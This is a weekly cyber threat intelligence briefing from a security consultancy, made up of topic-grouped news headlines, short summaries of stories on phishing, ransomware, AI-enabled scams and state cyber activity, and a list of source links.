Business cyber understanding gap creates new vulnerabilities

Cyber risk to intensify in 2025 as attackers switch tactics: Moody's - Reinsurance News

Cyber Security In The Digital Frontier: Reimagining Organisational Resilience

Charges Against CISOs Create Worries, Hope in Security Industry: Survey - Security Boulevard

The skills that cyber security leaders need

70 percent of cyber security leaders worry about personal liability

Report: 84% of Fortune 500 companies scored a D or worse for their cyber security efforts | Cybernews

CISOs need to consider the personal risks associated with their role - Help Net Security

Cyber security has become a strategic differentiator for organisations, says Ismail Al Naqi at GN forum | Technology – Gulf News

Cultivating a Hacker Mindset in Cyber Security Defence

Blackbaud Appoints Bradley Pyburn, Former Chief of Staff of US Cyber Command, to Board of Directors

Heed the warnings on cyber security threats - James McGachie

How to Improve Your Cyber Security On a Lower Budget | Mimecast

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Gangs’ Merciless Attacks Bleed Small Companies Dry

You’ve been hit with ransomware. Think twice before you pay. | Constangy, Brooks, Smith & Prophete, LLP - JDSupra

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

Cleo Vulnerability Exploitation Linked to Termite Ransomware Group - SecurityWeek

New Windows Drive-By Security Attack—What You Need To Know

What Do We Know About the New Ransomware Gang Termite?

Ransomware Victims

Blue Yonder SaaS giant breached by Termite ransomware gang

8Base hacked port operating company Luka Rijeka - Help Net Security

Separate ransomware attacks hit Japanese firms’ US subsidiaries | SC Media

Deloitte Responds After Ransomware Group Claims Data Theft - SecurityWeek

Anna Jaques Hospital ransomware breach exposed data of 300K patients

National Museum of the Royal Navy hit by cyber attack - Museums Association

Ransomware Disrupts Operations At Leading Heart Surgery Device Maker

Krispy Kreme admits there's a hole in its security • The Register

Phishing & Email Based Attacks

Businesses plagued by constant stream of malicious emails - Help Net Security

Phishing: The Silent Precursor to Data Breaches - SecurityWeek

A new report shows QR code phishing is on the rise | Security Magazine

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

Cyber criminals are using virtual hard drives to drop RATs in phishing attacks | TechRadar

European Police Disrupt Phone Phishing Gang with Arrests - Infosecurity Magazine

Eight Suspected Phishers Arrested in Belgium, Netherlands - SecurityWeek

Millionaire Airbnb Phishing Ring Busted Up by Police

Brand Impersonations Surge 2000% During Black Friday

Scam Kit Maker Rebuilding Business After Telegram Channel Shut Down - Security Boulevard

New Advanced Email Attack Warning Issued—5 Things To Know

Email security: Why traditional defences fall short in today's threat landscape

Fake Recruiters Distribute Banking Trojan via Malicious Apps in Phishing Scam

Businesses received over 20 billion spam emails this year | TechRadar

Phishing Scam Targets Ukrainian Defence Companies - Infosecurity Magazine

5 Email Attacks You Need to Know for 2025 | Abnormal

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Understanding the Shifting Anatomy of BEC Attacks

Notorious Nigerian cyber criminal tied to BEC scams extradited to US | CyberScoop

Other Social Engineering

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

KnowBe4 Report Finds 44% of HR Professionals Have Encountered Fraudulent or Scam Job Applications - IT Security Guru

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Cyber criminals Impersonate Dubai Police to Defraud Consumers in the UAE - Smishing Triad in Action

Hackers are posing as job recruiters to spread a dangerous banking trojan and steal your money — don’t fall for this | Tom's Guide

Spain busts voice phishing ring for defrauding 10,000 bank customers

Fake IT Workers Funnelled Millions to North Korea, DOJ Says - SecurityWeek

Artificial Intelligence

Generative AI's cyber security potential is clear, but so far it's given hackers the upper hand | ITPro

AI & cyber security to shape the tech landscape in 2025

Microsoft Recall caught capturing credit card and Social Security numbers despite reassurances it won't | Tom's Guide

AI is a gamble we cannot afford without cyber security

Compromised AI Library Delivers Cryptocurrency Miner via PyPI - Infosecurity Magazine

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

A Very Merry NISTmas: 2024 Updates to the Cyber Security and AI Framework | Ropes & Gray LLP - JDSupra

2FA/MFA

Microsoft Azure MFA Flaw Allowed Easy Access Bypass - Infosecurity Magazine

Microsoft MFA Bypassed via AuthQuake Attack  - SecurityWeek

No User Interaction, No Alerts: Azure MFA Cracked In An Hour

Researchers Crack Microsoft Azure MFA in an Hour

Snowflake Rolls Out Mandatory MFA Plan

Malware

Employee Visits to Adult or Gambling Sites Doubles | Newswise

Windows, macOS users targeted with crypto-and-info-stealing malware - Help Net Security

Cyber criminals are using virtual hard drives to drop RATs in phishing attacks | TechRadar

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

Open source malware surged by 156% in 2024 | ITPro

Fake Recruiters Distribute Banking Trojan via Malicious Apps in Phishing Scam

Remcos RAT Malware Evolves with New Techniques - Infosecurity Magazine

More advanced Zloader malware variant emerges | SC Media

Hackers are posing as job recruiters to spread a dangerous banking trojan and steal your money — don’t fall for this | Tom's Guide

This devious new malware technique looks to hijack Windows itself to avoid detection | TechRadar

New stealthy Pumakit Linux rootkit malware spotted in the wild

RedLine info-stealer campaign targets Russian businesses

North Korean hackers target South Korea with Internet Explorer vulnerabilities to deploy RokRAT malware | TechRadar

Ongoing Phishing and Malware Campaigns in December 2024

Bots/Botnets

It’s Beginning To Look A Lot Like Grinch Bots

Mobile

Lookout Discovers New Spyware Deployed by Russia and China - Infosecurity Magazine

Gamaredon Deploys Android Spyware "BoneSpy" and "PlainGnome" in Former Soviet States

'EagleMsgSpy' Android Spyware Linked to Chinese Police

New Smartphone Warning—Forget What You’ve Been Told About Security

Chinese EagleMsgSpy Spyware Found Exploiting Mobile Devices Since 2017

Experts discovered the first mobile malware families linked to Russia's Gamaredon

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Apple’s iPhone Hit By FBI Warning And Lawsuit Before iOS 18.2 Release

Denial of Service/DoS/DDoS

Europol Dismantles 27 DDoS Attack Platforms Across 15 Nations; Admins Arrested

Internet of Things – IoT

EU cyber security rules for smart devices enter into force | TechCrunch

DoD Digital Forensics: Unlocking Evidence In Cars, Wearables, And IoT

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

Vulnerabilities in Skoda & Volkswagen Cars Let Hackers Remotely Track Users

Data Breaches/Leaks

Phishing: The Silent Precursor to Data Breaches - SecurityWeek

Deloitte Denies Breach, Claims Cyber-Attack Targeted Single Client - Infosecurity Magazine

Deloitte sues 3 partners who 'leaked secrets' to rival firm

Public Reprimands, an Effective Deterrent Against Data Breaches - Infosecurity Magazine

Salt Typhoon recorded 'very senior' US officials' calls • The Register

446,000 Impacted by Center for Vein Restoration Data Breach - SecurityWeek

Massive Data Breach Hits Senior Dating Website, Exposing Over 765,000 Users

Cyber security expert Abi Waddell hacked huntsmen to leak their names and addresses

Attackers can abuse the Windows UI Automation framework to steal data from apps | CSO Online

Cyber security Lessons From 3 Public Breaches

Over 300K Prometheus Instances Exposed: Credentials and API Keys Leaking Online

New Atrium Health data breach impacts 585,000 individuals

Thousands of children exposed in major data breach — including names, addresses and social security numbers | Tom's Guide

US Bitcoin ATM operator Byte Federal suffered a data breach

Organised Crime & Criminal Actors

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

Recently Charged Scattered Spider Suspect Did Poor Job at Covering Tracks - SecurityWeek

Cyber crime gang arrested after turning Airbnbs into fraud centres

Russian government spies targeted Ukraine using tools developed by cyber criminals | TechCrunch

Emulating the Financially Motivated Criminal Adversary FIN7 – Part 1 - Security Boulevard

Alleged Scattered Spider hacker arrested, indicted | SC Media

Cyber security expert Abi Waddell hacked huntsmen to leak their names and addresses

Scam Kit Maker Rebuilding Business After Telegram Channel Shut Down - Security Boulevard

Cyber criminal marketplace Rydox seized in international law enforcement operation | CyberScoop

FBI Busts Rydox Marketplace with 7,600 PII Sales, Cryptocurrency Worth $225K Seized

He Investigates the Internet’s Most Vicious Hackers—From a Secret Location - WSJ

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Windows, macOS users targeted with crypto-and-info-stealing malware - Help Net Security

Radiant links $50 million crypto heist to North Korean hackers

"CP3O" pleads guilty to multi-million dollar cryptomining scheme

North Korean Group UNC4736 Blamed for Radiant Capital Breach

Compromised AI Library Delivers Cryptocurrency Miner via PyPI - Infosecurity Magazine

US Bitcoin ATM operator Byte Federal suffered a data breach

Insider Risk and Insider Threats

Employee Visits to Adult or Gambling Sites Doubles | Newswise

Deloitte sues 3 partners who 'leaked secrets' to rival firm

How To Flip the Script on the Latest Insider Threat Trends

KnowBe4 Report Finds 44% of HR Professionals Have Encountered Fraudulent or Scam Job Applications - IT Security Guru

Insurance Worker Sentenced After Illegally Accessing Claimants’ Data - Infosecurity Magazine

7 types of insider threats | University of Strathclyde

Insurance

Lloyd's of London Launches First-of-its-kind Consortium Built on HITRUST Certification to Shape the Future of Cyber Insurance

How to make your clients less attractive to cyber criminals | Insurance Business America

Supply Chain and Third Parties

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

Blue Yonder SaaS giant breached by Termite ransomware gang

Containers are a weak link in supply chain security

Lessons From the Largest Software Supply Chain Incidents

Cloud/SaaS

Hackers are exploiting a flaw in popular file-transfer tools to launch mass hacks, again | TechCrunch

Blue Yonder SaaS giant breached by Termite ransomware gang

Who handles what? Common misconceptions about SaaS security responsibilities - Help Net Security

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Thousands of AWS credentials stolen from misconfigured sites • The Register

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

Microsoft MFA Bypassed via AuthQuake Attack  - SecurityWeek

No User Interaction, No Alerts: Azure MFA Cracked In An Hour

Outages

Microsoft 365 outage takes down Office web apps, admin center

Facebook, Instagram, WhatsApp hit by massive worldwide outage

ChatGPT and Sora experienced a major outage | TechCrunch

Russian users report Gazprombank outages amid alleged Ukrainian cyber  attack | The Record from Recorded Future News

Encryption

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Google says its breakthrough Willow quantum chip can’t break modern cryptography - The Verge

Apple’s iPhone Hit By FBI Warning And Lawsuit Before iOS 18.2 Release

Linux and Open Source

Open source malware surged by 156% in 2024 | ITPro

New stealthy Pumakit Linux rootkit malware spotted in the wild

Passwords, Credential Stuffing & Brute Force Attacks

Thousands of AWS credentials stolen from misconfigured sites • The Register

Over 300K Prometheus Instances Exposed: Credentials and API Keys Leaking Online

Hackers Target Global Sporting Events With Fake Domains To Steal Logins

Social Media

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

Massive Data Breach Hits Senior Dating Website, Exposing Over 765,000 Users

Training, Education and Awareness

Opinion: Why cyber security awareness is everyone's responsibility  | Calgary Herald

Regulations, Fines and Legislation

EU cyber security rules for smart devices enter into force | TechCrunch

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

Why Americans must be prepared for cyber security’s worst | CyberScoop

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

US Telco Security Efforts Ramp Up After Salt Typhoon

Experts Call for Overhaul of National Cyber Director Role

Cyprus financial sector gears up for stricter cyber security | Cyprus Mail

Models, Frameworks and Standards

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

A Very Merry NISTmas: 2024 Updates to the Cyber Security and AI Framework | Ropes & Gray LLP - JDSupra

Understanding ISO 27001: The Backbone of Information Security Management: By Kajal Kashyap

Careers, Working in Cyber and Information Security

HR Magazine - Lock it in: How to close the cyber security training gap

What makes for a fulfilled cyber security career - Help Net Security

Law Enforcement Action and Take Downs

Recently Charged Scattered Spider Suspect Did Poor Job at Covering Tracks - SecurityWeek

Europol Dismantles 27 DDoS Attack Platforms Across 15 Nations; Admins Arrested

European Police Disrupt Phone Phishing Gang with Arrests - Infosecurity Magazine

Eight Suspected Phishers Arrested in Belgium, Netherlands - SecurityWeek

Spain busts voice phishing ring for defrauding 10,000 bank customers

Notorious Nigerian cyber criminal tied to BEC scams extradited to US | CyberScoop

Cyber criminal marketplace Rydox seized in international law enforcement operation | CyberScoop

Millionaire Airbnb Phishing Ring Busted Up by Police

"CP3O" pleads guilty to multi-million dollar cryptomining scheme

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Horizon Post Office scandal: Police investigating dozens for perjury and perverting the course of justice | The Independent

Jersey police help disrupt multi-billion money laundering networks | Bailiwick Express

Misinformation, Disinformation and Propaganda

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Keep cash at home due to cyber attack risks, Dutch Central Bank warns – The Irish Times

NATO Offensive cyber operations exercise Crossed Swords gets underway in Tallinn

Nation State Actors

China

Salt Typhoon recorded 'very senior' US officials' calls • The Register

Counterintelligence director reveals extent of damage from China telecom hacks - Washington Times

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

How Chinese insiders exploit its surveillance state • The Register

Compromised Software Code Poses New Systemic Risk to US Critical Infrastructure

Chinese hackers use Visual Studio Code tunnels for remote access

US Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

US Telco Security Efforts Ramp Up After Salt Typhoon

Why did China hack the world’s phone networks?

Chinese EagleMsgSpy Spyware Found Exploiting Mobile Devices Since 2017

US govt says Cisco gear often targeted in China's Salt Typhoon attacks on 8 telecommunications providers — issues Cisco-specific advice to patch networks to fend off attacks | Tom's Hardware

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

As US finally details Chinese Salt Typhoon attack, FCC Chair proposes new rules for telcos

'EagleMsgSpy' Android Spyware Linked to Chinese Police

Russia

Lookout Discovers New Spyware Deployed by Russia and China - Infosecurity Magazine

Keep cash at home due to cyber attack risks, Dutch Central Bank warns – The Irish Times

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Russian hacktivists target oil, gas and water sectors worldwide | SC Media

Suspected Russian hackers target Ukrainian defence enterprises in new espionage campaign | The Record from Recorded Future News

Russian government spies targeted Ukraine using tools developed by cyber criminals | TechCrunch

EU envoys to discuss first sanctions targeting Russian hybrid threats

Exploring Cyber-Darkness: How Moscow Undermines the West via the Dark Web | Geopolitical Monitor

NATO Offensive cyber operations exercise Crossed Swords gets underway in Tallinn

Gamaredon Deploys Android Spyware "BoneSpy" and "PlainGnome" in Former Soviet States

Ukraine Weighs Telegram Security Risks Amid War With Russia - The New York Times

Romania Exposes Propaganda Campaign Supporting Pro-Russian Candidate - Infosecurity Magazine

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

Experts discovered the first mobile malware families linked to Russia's Gamaredon

Threat hunting case study: Cozy Bear | Intel 471

Phishing Scam Targets Ukrainian Defence Companies - Infosecurity Magazine

Russia disconnects several regions from the global internet to test its sovereign net | TechRadar

Russia takes unusual route to hack Starlink-connected devices in Ukraine - Ars Technica

Russian users report Gazprombank outages amid alleged Ukrainian cyber attack | The Record from Recorded Future News

RedLine info-stealer campaign targets Russian businesses

North Korea

North Korea's fake IT worker scam hauled in $88 million • The Register

Radiant links $50 million crypto heist to North Korean hackers

North Korean Group UNC4736 Blamed for Radiant Capital Breach

North Korean hackers target South Korea with Internet Explorer vulnerabilities to deploy RokRAT malware | TechRadar

Tools and Controls

Who handles what? Common misconceptions about SaaS security responsibilities - Help Net Security

Security researchers set up an API honeypot to dupe hackers – and the results were startling | ITPro

Neglect of endpoints presents a major security gap for enterprises

Conquering the Complexities of Modern BCDR

Safe Handling of Data: Why Secrets Sprawl is a Risk - Security Boulevard

Why don’t security leaders get the funds they need to succeed? | SC Media

What is Cyber Threat Detection and Response? | UpGuard

US Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

Bug bounty programs: Why companies need them now more than ever | CSO Online

Cyber Security Products or Platforms - Which is More Effective? - Security Boulevard

AI is a gamble we cannot afford without cyber security

Exposed APIs and issues in the world's largest organisations - Help Net Security

WAF Vulnerability in Akamai, Cloudflare, and Imperva Affected 40% of Fortune 100 Companies

Microsoft enforces defences preventing NTLM relay attacks - Help Net Security

Businesses struggle with IT security, Kaspersky reports

Unlocking the Value of DSPM: What You Need to Know - IT Security Guru

7 Must-Know IAM Standards in 2025

Mastering PAM to Guard Against Insider Threats - Security Boulevard

The Future of Network Security: Automated Internal and External Pentesting

How to Make the Case for Network Security Audits - Security Boulevard

Strengthening security posture with comprehensive cyber security assessments - Help Net Security

Three-Quarters of Security Leaders Admit Gaps in Hardware Knowledge - Infosecurity Magazine

Generative AI's cyber security potential is clear, but so far it's given hackers the upper hand | ITPro

TPM 2.0: The new standard for secure firmware - Help Net Security

How to Improve Your Cyber Security On a Lower Budget | Mimecast

Reports Published in the Last Week

New Report from Cloud Security Alliance Highlights Key Aspects of Data Resiliency in the Financial Sector | Business Wire

The Cyber Security Challenge in Mergers and Acquisitions - ReliaQuest

5 Email Attacks You Need to Know for 2025 | Abnormal

Cloudflare 2024 report highlights internet growth and rising cyber security challenges - SiliconANGLE

Kiteworks 2025 Cyber Security Report Unveils Critical Trends And Strategies For Protecting Sensitive Data

2025 Forecast Report for Managing Private Content Exposure Risk

Other News

UK SMEs Are Concerned About Preparedness For Cyber Attacks as Fraud Rises Finds Mollie | The Fintech Times

TfL cyber attack cost over £30m to date | Computer Weekly

50% Of M&A Security Issues Are Non-Malicious

Cyber Security In The Digital Frontier: Reimagining Organisational Resilience

Attackers can abuse the Windows UI Automation framework to steal data from apps | CSO Online

Microsoft enforces defences preventing NTLM relay attacks - Help Net Security

Businesses struggle with IT security, Kaspersky reports

IT pros say hackers could compromise device supply chain, firmware security | SC Media

Report: 84% of Fortune 500 companies scored a D or worse for their cyber security efforts | Cybernews

Non-Human Identities: The Silent Threat - InfoRiskToday

The Big Question: Is the UK doing enough when it comes to cyber risks? - Emerging Risks Media Ltd

From Europe to South Africa: Where Is the World on Cyber Defence?

You Don’t Talk to Strangers, So Why Does Your Internet? | SC Media

Drowning in spam? Stop giving out your email address - do this instead | ZDNET

Heed the warnings on cyber security threats - James McGachie

Utility Companies Face 42% Surge in Ransomware Attacks - Infosecurity Magazine

Safeguarding Charities From Cyber Crime l Blog l Nelsons Solicitors

Vulnerability Management

What Is an Application Vulnerability? 8 Common Types - Security Boulevard

Containers have 600+ vulnerabilities on average - Help Net Security

Vulnerabilities

Microsoft Fixes 72 Flaws, Including Patch for Actively Exploited CLFS Vulnerability

SonicWall Patches 6 Vulnerabilities in Secure Access Gateway - SecurityWeek

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

SAP Patches Critical Vulnerability in NetWeaver - SecurityWeek

Adobe Patches Over 160 Vulnerabilities Across 16 Products - SecurityWeek

Micropatching service releases fix for a zero-day vulnerability affecting three Windows generations | TechSpot

Apple Pushes Major iOS, macOS Security Updates - SecurityWeek

Apache issues patches for critical Struts 2 RCE bug • The Register

Security Flaws in WordPress Woffice Theme Prompts Urgent Update - Infosecurity Magazine

New Windows zero-day exposes NTLM credentials, gets unofficial patch

Unauthorized file access possible with chained Mitel MiCollab flaws | SC Media

New Windows Warning As Zero-Day With No Official Fix Confirmed For All Users

Ivanti Issues Critical Security Updates for CSA and Connect Secure Vulnerabilities

Microsoft Azure MFA Flaw Allowed Easy Access Bypass - Infosecurity Magazine

Multiple Ivanti CSA Vulnerabilities Let Attackers Bypass Admin Web Console Remotely

WAF Vulnerability in Akamai, Cloudflare, and Imperva Affected 40% of Fortune 100 Companies

QNAP Patches Vulnerabilities Exploited at Pwn2Own - SecurityWeek

OpenWrt supply chain attack scare prompts urgent upgrades • The Register

Atlassian, Splunk Patch High-Severity Vulnerabilities - SecurityWeek

AMD VM security tools can be bypassed, letting hackers infilitrate your devices, experts warn | TechRadar

Hunk Companion WordPress plugin exploited to install vulnerable plugins

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Generative AI Makes Phishing Attacks More Believable and Cost-Effective

In a survey of 14,500 executives, IT and security professionals, and office workers, Avanti found that phishing is the top threat that is increasing due to generative AI. Training is a vital element of security, and although 57% of organisations say they use anti-phishing training to protect themselves from sophisticated social engineering attacks, only 32% believe that such training is “very effective”. Lack of skills is a major challenge for one in three security professionals. Real-time, accessible data is essential, yet 72% of IT and security data remain siloed.

Nearly Half a Billion Emails to Businesses Contain Malicious Content

A report by Hornetsecurity shows that over a third of all business emails in 2024 were unwanted, with 2.3% (around 427.8 million) containing malicious content. Phishing drove a third of all cyber attacks, while malicious URLs accounted for nearly a quarter. Reverse-proxy credential theft rose, using links instead of file attachments. Shipping brands like DHL and FedEx were the most impersonated. The data underscores the need for a zero-trust mindset and improved user awareness to strengthen defences against increasingly sophisticated threats.

65% of Office Workers Bypass Cyber Security to Boost Productivity

CyberArk found that 65% of office staff circumvent policies to improve their productivity, with half frequently reusing passwords and nearly a third sharing credentials. Over a third ignore important updates, and many use AI tools, often feeding sensitive data without adhering to guidelines. Senior executives are twice as likely to fall victim to phishing. The findings highlight the urgent need for identity-focused security strategies that enable efficient work while reducing risk.

Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States

EU cyber body ENISA reports a surge in hostile cyber activity across Europe, warning that escalating espionage, sabotage, violence, and disinformation threaten essential services and strategic interests. A successful attack on Europe’s key supply chains could have catastrophic cascading effects. Germany has formed a new task force to counter these threats before the federal election, while the UK’s national cyber agency confirms increased and more sophisticated hostile activity. Russia and China remain prominent cyber espionage threats. ENISA rates the threat to EU entities as “substantial”, as malicious cyber activity is deployed to manipulate events, destabilise societies, and undermine EU democracy and values.

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

INTERPOL’s latest global cyber crime crackdown led to over 5,500 arrests and seized more than $400 million in assets. Involving 40 countries, it dismantled a voice phishing operation that stole $1.1 billion from over 1,900 victims. Criminals impersonated law enforcement, exploiting digital currencies and undermining trust in financial systems. INTERPOL also warned of new scams using stablecoins and romance-themed lures to drain victims’ wallets. These results highlight the urgent need for international collaboration to counter large-scale cyber crime and protect individuals, businesses, and the integrity of digital economies.

Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences

A new phishing campaign is using corrupted ZIP archives and Office documents to bypass email security measures. Since August 2024, attackers have exploited the built-in recovery features of popular software to open seemingly broken files. Users are tricked by false promises like employee benefits, and once opened, these documents contain QR codes redirecting victims to malicious websites. The files evade most security filters while appearing to function normally. This highlights how attackers continually search for new techniques to slip past cyber security tools and compromise organisations’ systems and data.

Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies

British authorities uncovered a vast Russian-linked money laundering system connecting drug traffickers, cyber criminals and sanctioned elites, resulting in over 80 arrests worldwide. This billion-dollar operation relied on two Moscow-based firms to shift value across 30 countries using cryptocurrency, property and other assets. More than £20 million in cash and cryptocurrency has already been seized. New sanctions target senior figures behind the networks, aiming to disrupt their access to global financial systems. The investigation revealed that narcotics gangs, Russian state-linked espionage activities and cyber criminals all benefited, posing a significant threat to global security and financial stability.

UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs

The UK’s National Cyber Security Centre (NCSC) warns organisations are underestimating state and criminal cyber threats. Hostile activities have increased, with severe incidents trebling to 12 last year. Ransomware attacks remain a major concern, targeting sectors from academia to healthcare. The centre responded to 430 serious incidents, up from 371 previously. Russia’s “aggression and recklessness” and China’s “sophisticated” attacks highlight how critical national infrastructure and key services remain vulnerable. The call is clear: organisations must strengthen defences to address these evolving threats, which pose a growing risk to both economic stability and public services.

Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks

The latest report from cyber security provider Gen shows a 614% quarterly rise in ‘scam-yourself’ cyber attacks, where victims unwittingly paste malicious code themselves. Tactics include fake tutorials, deceptive tech support, false CAPTCHA prompts and bogus updates. This spike coincides with a 39% surge in data-stealing malware and a 1154% increase in a popular information stealer. Such threats are reshaping the landscape, catching millions off-guard and driving urgent attention to robust cyber security solutions. Business leaders must foster greater awareness and invest in proactive, multilayered cyber security strategies to protect their organisations.

Security Must Be Used as a Springboard, Not Just a Shield

Many organisations still view cyber security as a necessary expense rather than a growth catalyst. Research suggests that embracing it as a strategic enabler can boost productivity, build customer trust, and strengthen competitiveness. It found that nearly half of surveyed organisations suffered more than 12 hours of downtime after a cyber attack, with a third experiencing a full day’s disruption. As more connected environments emerge, security leaders must highlight metrics like uptime and customer satisfaction to board members. By doing so, cyber security becomes a driver of operational resilience and long-term success, not just a shield against threats.

Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots

Only 1% of organisations recently surveyed received full reimbursement from their cyber insurance, and the average payout covered just 63% of incurred costs. Nearly half lacked clarity about what their policies covered. Common shortfalls arose when remediation expenses exceeded coverage limits or were not pre-approved, and when required security measures were not fully implemented. Strengthening cyber security practices increased the likelihood of better coverage, with more than three-quarters seeing improved terms after boosting cyber defences. Involving IT and security teams in insurance decisions and improving internal protections can help deliver more comprehensive and cost-effective cyber insurance in the future.

Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns

The FBI warns that cyber criminals increasingly use generative AI to create believable text, images, audio, and video. This allows them to scale their cyber crime operations and trick victims by avoiding usual warning signs. Criminals impersonate trusted individuals, forge identification, and run convincing investment or donation scams. The FBI suggests using a secret word with loved ones, being cautious with personal details, and watching for subtle inconsistencies. Confirm unsolicited calls or messages by independently contacting banks or authorities, and limit sharing personal images or voice recordings online as a precaution.

Sources:

https://www.helpnetsecurity.com/2024/12/06/genai-phishing-attacks-concerns/

https://www.prnewswire.com/news-releases/nearly-half-a-billion-emails-to-businesses-contain-malicious-content-hornetsecurity-report-finds-302321390.html

https://www.helpnetsecurity.com/2024/12/04/employees-privileged-access-security-risk/

https://www.irishexaminer.com/news/arid-41529398.html

https://thehackernews.com/2024/12/interpol-arrests-5500-in-global.html

https://thehackernews.com/2024/12/hackers-use-corrupted-zips-and-office.html

https://therecord.media/russian-money-laundering-networks-trafficking-cybercrime-kremlin

https://www.theguardian.com/technology/2024/dec/03/uk-underestimates-threat-of-cyber-attacks-from-hostile-states-and-gangs-says-security-chief

https://www.forbes.com/sites/daveywinder/2024/12/02/why-you-must-beware-of-dangerous-new-scam-yourself-cyber-attacks/

https://betanews.com/2024/11/29/security-must-be-used-as-a-springboard-not-just-a-shield/

https://www.scworld.com/resource/why-your-cyber-insurance-may-not-cover-everything-finding-and-fixing-blind-spots

https://cybernews.com/security/cybercriminals-using-ai-for-most-types-of-scams-fbi/  

Governance, Risk and Compliance

Many small businesses are falling well short when it comes to cyber security plans | TechRadar

Security must be used as a springboard, not just a shield

NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News

6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra

CISOs will face growing challenges in 2025 and beyond | Computer Weekly

CISOs in 2025: Evolution of a High-Profile Role

65% of employees bypass cyber security policies, driven by hybrid work and flexible access

Why Operational Risk Planning Is Crucial For Every SME

Large And Small Businesses Face More Serious Repercussions From Cyber Threats | HackerNoon

Incident Response Playbooks: Are You Prepared?

63% of companies plan to pass data breach costs to customers | CSO Online

Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media

How to talk to your board about tech debt | CIO

Navigating the Changing Cyber Security Regulations Landscape

The Rising Tide of Cyber Threats: Stay Ahead, Fortify Defences - The Futurum Group

Employees suffering compliance and security fatigue | theHRD

Building a robust security posture with limited resources - Help Net Security

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Strikes when Organisations Unknowingly Open the Door | Security Info Watch

Does Cyber Insurance Drive Up Ransom Demands?

Why Are Hospital Ransomware Attacks Becoming More Frequent Globally? The UN Met to Discuss | HackerNoon

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

No company too small for Phobos ransomware gang, indictment reveals | Malwarebytes

Storm-1811 exploits RMM tools to drop Black Basta ransomware

Ransomware attacks on critical sectors ramped up in November | TechTarget

Hackers are pivoting from data breaches to business shutdowns

Wanted Russian Hacker Linked to Hive and LockBit Ransomware Arrested

Ransomware's Grip on Healthcare

